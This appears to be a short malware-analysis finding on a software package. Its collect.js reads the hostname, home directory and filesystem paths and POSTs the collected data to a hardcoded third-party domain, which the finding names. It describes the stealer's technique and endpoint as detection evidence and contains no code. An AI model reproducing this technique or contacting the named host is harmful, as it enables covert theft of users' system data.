The package's collect.js imports child_process, fs, http, https, and os, reads host identifiers via os.hostname() and os.homedir(), inspects local filesystem paths via fs.existsSync, and POSTs collected data to a hardcoded external endpoint at http://aab.sportsontheweb.net. The destination is not a registry, vendor SDK host, or documented service — it is an unrelated third-party domain bound to a POST in install/load-reachable code. The combination of system enumeration (hostname, homedir, child_process), filesystem inspection, and a hardcoded non-publisher exfiltration endpoint is the canonical host-information stealer fingerprint and provides direct attacker benefit (host fingerprinting + arbitrary collected data shipped off-host).